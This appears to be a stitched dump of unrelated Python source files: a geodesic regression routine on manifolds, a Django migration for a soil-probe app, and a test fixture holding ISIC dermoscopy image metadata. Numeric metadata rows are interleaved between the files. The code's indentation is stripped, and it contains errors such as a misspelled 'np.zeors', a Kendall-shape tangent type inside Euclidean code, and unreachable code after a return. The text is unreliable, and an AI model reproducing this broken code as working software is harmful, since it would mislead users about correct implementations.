v_tangent_on_p_anchor_param = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
#################################################################################
### Euclidean Numbers ###
#################################################################################
def MultivariateLinearizedGeodesicRegression_Euclidean_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression( t_list_g, pt_list_g )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ] )
# # Check R2
# mean_g = FrechetMean( pt_list[ g ] )
# sqDist_SG_sum = 0
# sqVar_sum = 0
# for i in range( len( pt_list[ g ] ) ):
# p_i = pt_list_g[ i ]
# t_i = t_list_g[ i ]
# slope_t_i = v_g.ScalarMultiply( t_i )
# est_p_i = p0_g.ExponentialMap( slope_t_i )
# tVec_est_p_i_to_p_i = est_p_i.LogMap( p_i )
# sqDist_i = tVec_est_p_i_to_p_i.normSquared()
# sqDist_SG_sum += sqDist_i
# tVec_mean_to_p_n = mean_g.LogMap( p_i )
# sqVar_n = tVec_mean_to_p_n.normSquared()
# sqVar_sum += sqVar_n
# R2_SG = 1 - ( sqDist_SG_sum / sqVar_sum )
# print( "Subject : " + str( g ) )
# print( str( nData_group[ g ] ) + " Obs." )
# print( R2_SG )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_Euclidean( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_Euclidean( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
def MultivariateLinearizedGeodesicRegression_Intercept_Euclidean( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
if nParam == 0:
base = FrechetMean( Y )
tangent_arr = []
return base, tangent_arr
# Anchor point is chosen by the last entry of covariates
# Continuous variable such as a genetic disease score should be the last entry of covariates
# If data don't have a continuous covariates, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Set an anchor point
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.euclidean( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.euclidean_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[ d ].append( tVec_j.tVector[ d ] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.euclidean_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.euclidean_tVec( nManifoldDim )
tangent_t_n = manifolds.euclidean_tVec( nManifoldDim )
for par in range( nParam ):
for d in range( nManifoldDim ):
tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( tangent_t_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break;
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_Euclidean( X, Y, beta0, p0_list, tVec_intercept_arr, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0 or len( X[ 0 ] ) == 0 :
nManifoldDim = beta0.nDim
slope_tVec = manifolds.euclidean_tVec( nManifoldDim )
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] += ( Y_i_tilde.tVector[ d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ d ] - Y_i.tVector[ d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = np.zeros( nManifoldDim )
energy_k = 0
# Calculate FDM
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.euclidean_tVec( nManifoldDim )
slope_neg_eps = manifolds.euclidean_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_neg_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_pos_eps.tVector[ d ] = slope_tVec.tVector[ d ] + eps
slope_neg_eps.tVector[ d ] = slope_tVec.tVector[ d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.euclidean_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ dd ] = float( slope_pos_eps_at_p_i.tVector[ dd ] - slope_neg_eps_at_p_i.tVector[ dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.kendall2D_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ dd ] = slope_parT_p_i.tVector[ dd ] - Y_i.tVector[ dd ]
dE[ d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ] - ( stepSize * dE[ d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ d ] - Y_i.tVector[ d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter- 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
p_anchor = beta0
nManifoldDim = p_anchor.nDim
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
# Parallel translate a group-wise tangent vector to population-level intercept
tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for d in range( nManifoldDim ):
w_list[ d ].append( tVec_j.tVector[ d ] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t
v_t = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_t.tVector[ d ] = estModel_list[ d ].params[ 0 ]
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
###############################################################
##### Miscelleneous #####
###############################################################
def HelmertSubmatrix( nAtoms ):
# Create a Helmert submatrix - similarity-invariant
H = np.zeros( [ nAtoms - 1, nAtoms ] )
for k in range( nAtoms - 1 ):
h_k = -np.divide( 1.0, np.sqrt( ( k + 1 ) * ( k + 2 ) ) )
neg_kh_k = np.multiply( h_k, -( k + 1 ) )
for h in range( k + 1 ):
H[ k, h ] = h_k
H[ k, k + 1 ] = neg_kh_k
return H
def HelmertMatrix( nAtoms ):
# Create a Helmert matrix - similiarity-invariant : First row - Center of Gravity (mass) (uniform mass of points)
H_full = np.zeors( [ nAtoms, nAtoms ] )
for h in range( nAtoms ):
H_full[ 0, h ] = np.divide( 1, np.sqrt( nAtoms ) )
for k in range( 1, nAtoms, 1 ):
h_k = -np.divide( 1.0, np.sqrt( ( k ) * ( k + 1 ) ) )
neg_kh_k = np.multiply( h_k, -k )
for h in range( k ):
H_full[ k, h ] = h_k
H_full[ k, k ] = neg_kh_k
return H_full
| 29.394525
| 253
| 0.642437
| 25,639
| 179,336
| 4.204337
| 0.018253
| 0.0313
| 0.029788
| 0.01694
| 0.936815
| 0.915237
| 0.900172
| 0.888149
| 0.873454
| 0.860763
| 0
| 0.015346
| 0.206428
| 179,336
| 6,100
| 254
| 29.399344
| 0.742088
| 0.144745
| 0
| 0.838594
| 0
| 0
| 0.064707
| 0.025643
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024086
| false
| 0
| 0.001938
| 0.000277
| 0.065891
| 0.156977
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ecf533bd84460954ddb14e261ac689748acc28a
| 7,941
|
py
|
Python
|
soil/skeleton/migrations/0005_auto_20200319_1134.py
|
mahalsnz/terraprobe
|
e6579fbcd0d15982a24a29172b1e57830a54a4f6
|
[
"FSFAP"
] | 2
|
2021-06-22T22:03:21.000Z
|
2021-07-28T00:10:44.000Z
|
soil/skeleton/migrations/0005_auto_20200319_1134.py
|
mahalsnz/soilmoisture
|
e6579fbcd0d15982a24a29172b1e57830a54a4f6
|
[
"FSFAP"
] | 146
|
2019-06-19T03:15:55.000Z
|
2021-06-21T22:50:06.000Z
|
soil/skeleton/migrations/0005_auto_20200319_1134.py
|
mahalsnz/terraprobe
|
e6579fbcd0d15982a24a29172b1e57830a54a4f6
|
[
"FSFAP"
] | 4
|
2019-06-09T22:10:14.000Z
|
2020-08-03T21:11:25.000Z
|
# Generated by Django 2.2.1 on 2020-03-18 22:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('skeleton', '0004_auto_20200314_1328'),
]
operations = [
migrations.RemoveField(
model_name='site',
name='rz1_top',
),
migrations.RemoveField(
model_name='site',
name='rz2_top',
),
migrations.RemoveField(
model_name='site',
name='rz3_top',
),
migrations.AlterField(
model_name='calibration',
name='soil_type',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=1, null=True),
),
migrations.AlterField(
model_name='site',
name='depth1',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth10',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth2',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth3',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth4',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth5',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth6',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth7',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth8',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth9',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he1',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=1, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he10',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=10, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he2',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=2, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he3',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=3, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he4',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=4, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he5',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=5, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he6',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=6, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he7',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=7, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he8',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=8, null=True),
),
migrations.AlterField(
model_name='site',
name='depth_he9',
field=models.IntegerField(blank=True, choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=9, null=True),
),
migrations.AlterField(
model_name='site',
name='rz1_bottom',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, help_text='The Bottom Depth of Root Zone 1. The Top will aways be zero.', null=True),
),
migrations.AlterField(
model_name='site',
name='rz2_bottom',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, help_text='The Bottom Depth of Root Zone 2. The Top will aways be zero.', null=True),
),
migrations.AlterField(
model_name='site',
name='rz3_bottom',
field=models.IntegerField(blank=True, choices=[(0, 0), (10, 10), (20, 20), (30, 30), (40, 40), (50, 50), (60, 60), (70, 70), (80, 80), (90, 90), (100, 100), (110, 110), (120, 120)], default=0, help_text='The Bottom Depth of Root Zone 3. The Top will aways be zero.', null=True),
),
]
| 54.390411
| 290
| 0.488603
| 1,100
| 7,941
| 3.481818
| 0.087273
| 0.063446
| 0.088251
| 0.115405
| 0.918799
| 0.914099
| 0.904178
| 0.882768
| 0.863446
| 0.756397
| 0
| 0.188636
| 0.279688
| 7,941
| 145
| 291
| 54.765517
| 0.480944
| 0.005667
| 0
| 0.661871
| 1
| 0
| 0.068153
| 0.002914
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007194
| 0
| 0.028777
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
14e7779be7b2053d20777d3019a66eedb7132323
| 4,967
|
py
|
Python
|
sla_cli/tests/src/download/isic/conftest.py
|
DavidWalshe93/SL-CLI
|
c92ca8a6e57eb51bf9c9433013ce16d443f8d152
|
[
"MIT"
] | 2
|
2022-01-07T09:59:32.000Z
|
2022-01-25T12:04:06.000Z
|
sla_cli/tests/src/download/isic/conftest.py
|
DavidWalshe93/SL-CLI
|
c92ca8a6e57eb51bf9c9433013ce16d443f8d152
|
[
"MIT"
] | null | null | null |
sla_cli/tests/src/download/isic/conftest.py
|
DavidWalshe93/SL-CLI
|
c92ca8a6e57eb51bf9c9433013ce16d443f8d152
|
[
"MIT"
] | 1
|
2021-04-07T17:14:37.000Z
|
2021-04-07T17:14:37.000Z
|
"""
Author: David Walshe
Date: 10 April 2021
"""
import pytest
from sla_cli.src.download.downloader import DownloaderOptions
@pytest.fixture
def sample_isic_records():
"""Returns two isic archive metadata records."""
return [
{
'_id': '5436e3abbae478396759f0cf',
'_modelType': 'image',
'created': '2014-10-09T19:36:11.989000+00:00',
'creator': {'_id': '5450e996bae47865794e4d0d', 'name': 'User 6VSN'},
'dataset': {'_accessLevel': 0,
'_id': '5a2ecc5e1165975c945942a2',
'description': 'Moles and melanomas.\n'
'Biopsy-confirmed melanocytic lesions. Both '
'malignant and benign lesions are included.',
'license': 'CC-0',
'name': 'UDA-1',
'updated': '2014-11-10T02:39:56.492000+00:00'},
'meta': {'acquisition': {'image_type': 'dermoscopic',
'pixelsX': 1022,
'pixelsY': 767},
'clinical': {'age_approx': 55,
'anatom_site_general': 'anterior torso',
'benign_malignant': 'benign',
'diagnosis': 'nevus',
'diagnosis_confirm_type': None,
'melanocytic': True,
'sex': 'female'}},
'name': 'ISIC_0000000',
'notes': {'reviewed': {'accepted': True,
'time': '2014-11-10T02:39:56.492000+00:00',
'userId': '5436c6e7bae4780a676c8f93'},
'tags': ['Challenge 2018: Task 1-2: Training',
'Challenge 2019: Training',
'Challenge 2016: Training',
'Challenge 2017: Training']},
'updated': '2015-02-23T02:48:17.495000+00:00'
},
{
'_id': '5436e3acbae478396759f0d1',
'_modelType': 'image',
'created': '2014-10-09T19:36:12.070000+00:00',
'creator': {'_id': '5450e996bae47865794e4d0d', 'name': 'User 6VSN'},
'dataset': {'_accessLevel': 0,
'_id': '5a2ecc5e1165975c945942a2',
'description': 'Moles and melanomas.\n'
'Biopsy-confirmed melanocytic lesions. Both '
'malignant and benign lesions are included.',
'license': 'CC-0',
'name': 'UDA-1',
'updated': '2014-11-10T02:39:56.492000+00:00'},
'meta': {'acquisition': {'image_type': 'dermoscopic',
'pixelsX': 1022,
'pixelsY': 767},
'clinical': {'age_approx': 30,
'anatom_site_general': 'anterior torso',
'benign_malignant': 'benign',
'diagnosis': 'nevus',
'diagnosis_confirm_type': None,
'melanocytic': True,
'sex': 'female'}},
'name': 'ISIC_0000001',
'notes': {'reviewed': {'accepted': True,
'time': '2014-11-10T02:39:56.492000+00:00',
'userId': '5436c6e7bae4780a676c8f93'},
'tags': ['Challenge 2018: Task 1-2: Training',
'Challenge 2019: Training',
'Challenge 2016: Training',
'Challenge 2017: Training']},
'updated': '2015-02-23T02:48:27.455000+00:00'
}
]
@pytest.fixture
def expected_column_names():
"""Expected column names for metadata."""
return [
"isic_id",
"image_name",
"dataset",
"description",
"accepted",
"created",
"tags",
"pixels_x",
"pixels_y",
"age",
"sex",
"localization",
"benign_malignant",
"dx",
"dx_type",
"melanocytic"
]
@pytest.fixture
def expected_extended_column_names():
"""Expected column names for metadata after year tagging."""
return [
"isic_id",
"image_name",
"dataset",
"description",
"accepted",
"created",
"tags",
"pixels_x",
"pixels_y",
"age",
"sex",
"localization",
"benign_malignant",
"dx",
"dx_type",
"melanocytic",
"2016"
"2017"
"2018"
"2019"
"2020"
]
| 37.345865
| 84
| 0.421784
| 365
| 4,967
| 5.613699
| 0.372603
| 0.015617
| 0.021474
| 0.025378
| 0.816984
| 0.816984
| 0.816984
| 0.743777
| 0.743777
| 0.743777
| 0
| 0.15545
| 0.449567
| 4,967
| 132
| 85
| 37.628788
| 0.594001
| 0.037044
| 0
| 0.752137
| 0
| 0
| 0.384874
| 0.103361
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| true
| 0
| 0.017094
| 0
| 0.068376
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
09152ad3ad03b67623840f46ff00dbfdbecb9083
| 244
|
py
|
Python
|
jupyterlab2pymolpysnips/H-bonds/distance.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
jupyterlab2pymolpysnips/H-bonds/distance.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
